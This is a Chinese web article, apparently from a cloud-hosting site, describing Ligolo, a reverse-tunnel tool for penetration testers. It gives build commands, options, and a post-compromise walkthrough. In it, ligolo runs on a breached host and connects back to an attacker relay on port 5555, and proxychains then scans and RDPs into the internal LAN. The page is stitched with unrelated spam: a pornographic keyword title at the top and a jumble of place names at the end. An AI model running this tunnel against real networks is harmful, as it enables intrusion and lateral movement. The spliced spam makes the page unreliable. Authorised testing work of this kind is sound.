亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Ligolo是什么

發布時間:2021-12-27 14:23:33 來源:億速云 閱讀:123 作者:小新 欄目:網絡安全

這篇文章將為大家詳細講解有關Ligolo是什么,小編覺得挺實用的,因此分享給大家做個參考,希望大家閱讀完這篇文章后可以有所收獲。

Ligolo

Ligolo是一款專為滲透測試人員設計的反向隧道工具。實際上,它是一款實現和使用都非常簡單的輕量級工具,可以幫助滲透測試研究人員輕松通過一個反向連接建立一個完全安全的SOCKS5或TCP通信隧道。

跟Meterpreter以及Autoroute + Socks4a相比,Ligolo的運行速度更快,并且更加穩定。

功能介紹

1、TLS 1.3隧道,帶有TLS綁定;

2、多平臺支持,包括Windows、Linux和macOS等;

3、多路復用(1條TCP連接可多路復用);

4、SOCKS5代理或中繼;

使用場景

假設你在一次外部安全審計任務過程中,現在已經成功入侵了一臺Windows/Linux/macOS服務器。這臺服務器位于目標組織的本地局域網絡之中,而你想要與該網絡內的其他主機建立通信連接。

那么此時,Ligolo就可以幫助你實現這個目標。它可以給我們建立一條通信隨到并訪問目標內部服務器的資源。4

工具演示

使用Proxychains (WAN)實現RDP通信連接中繼。

工具性能

下面給出的圖片是該工具在兩臺100MB/s主機之間的性能圖,但實際情況需取決于目標系統和網絡配置。

Ligolo是什么

工具安裝和使用

安裝/編譯

首先,請確保你的系統中已經安裝了Go環境/工具。接下來,使用下列命令獲取Ligolo項目遠嗎和相關依賴組件:

cd `go env GOPATH`/srcgit clone https://github.com/sysdream/ligolocd ligolomake dep

生成自簽名的TLS證書,并存放至項目的certs目錄之中:

make certs TLS_HOST=example.com

當然了,你還可以通過TLS_CERT選項來使用你自己的TLS證書:

make build-all TLS_CERT=certs/mycert.pem

最后,進行項目代碼構建。

針對所有系統架構:

make build-all

針對當前系統架構:

make build

工具選項

Localrelay選項:

Usage of localrelay:  -certfile string    	The TLS server certificate (default "certs/server.crt")  -keyfile string    	The TLS server key (default "certs/server.key")  -localserver string    	The local server address (your proxychains parameter) (default "127.0.0.1:1080")  -relayserver string    	The relay server listening address (the connect-back address) (default "0.0.0.0:5555")

Ligolo選項:

Usage of ligolo:  -autorestart    	Attempt to reconnect in case of an exception  -relayserver string    	The relay server (the connect-back address) (default "127.0.0.1:5555")  -skipverify    	Skip TLS certificate pinning verification  -targetserver string    	The destination server (a RDP client, SSH server, etc.) - when not specified, Ligolo starts a socks5 proxy server

工具使用

Ligolo由下列兩個模塊組成:

1、 localrelay

2、 ligolo

Localrelay需要在攻擊者控制的服務器端運行,Ligolo則需要在目標主機上運行。

對于localrelay,你可以直接使用默認選項,它將監聽端口5555的所有接口,并等待來自ligolo的連接。

對于ligolo,你必須使用-relayserver ip:port參數的指定中繼服務器的IP地址,也就是攻擊者服務器的IP地址。

你可以使用-h選項查看工具的幫助命令。

Localrelay和ligolo之間的連接建立成功之后,工具會在中繼服務器的TCP端口1080上設置一個SOCKS5代理,接下來你就可以使用你喜歡的工具來滲透目標的LAN網絡了。

在攻擊者服務器端,運行下列命令:

./bin/localrelay_linux_amd64

在目標主機中,運行下列命令:

> ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555

一旦通信連接建立成功,請在ProxyChains的配置文件中設置下列參數(在攻擊者服務器端):

[ProxyList]# add proxy here ...# meanwile# defaults set to "tor"socks5     127.0.0.1 1080

最后:

$ proxychains nmap -sT 10.0.0.0/24 -p 80 -Pn -A$ proxychains rdesktop 10.0.0.123

許可證協議

Ligolo項目的開發與發布遵循GNU General Public License v3.0開源許可證協議。

關于“Ligolo是什么”這篇文章就分享到這里了,希望以上內容可以對大家有一定的幫助,使各位可以學到更多知識,如果覺得文章不錯,請把它分享出去讓更多的人看到。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

铜梁县| 察哈| 霸州市| 奉节县| 山阴县| 石狮市| 达拉特旗| 江川县| 安阳市| 荔浦县| 射洪县| 海丰县| 清新县| 宁都县| 新巴尔虎右旗| 应城市| 盘锦市| 西乡县| 乐至县| 浦县| 宝山区| 六盘水市| 遂平县| 五家渠市| 团风县| 沧源| 闵行区| 年辖:市辖区| 隆昌县| 景宁| 伊通| 鄂尔多斯市| 梁河县| 财经| 唐海县| 界首市| 聊城市| 始兴县| 冕宁县| 德格县| 枝江市|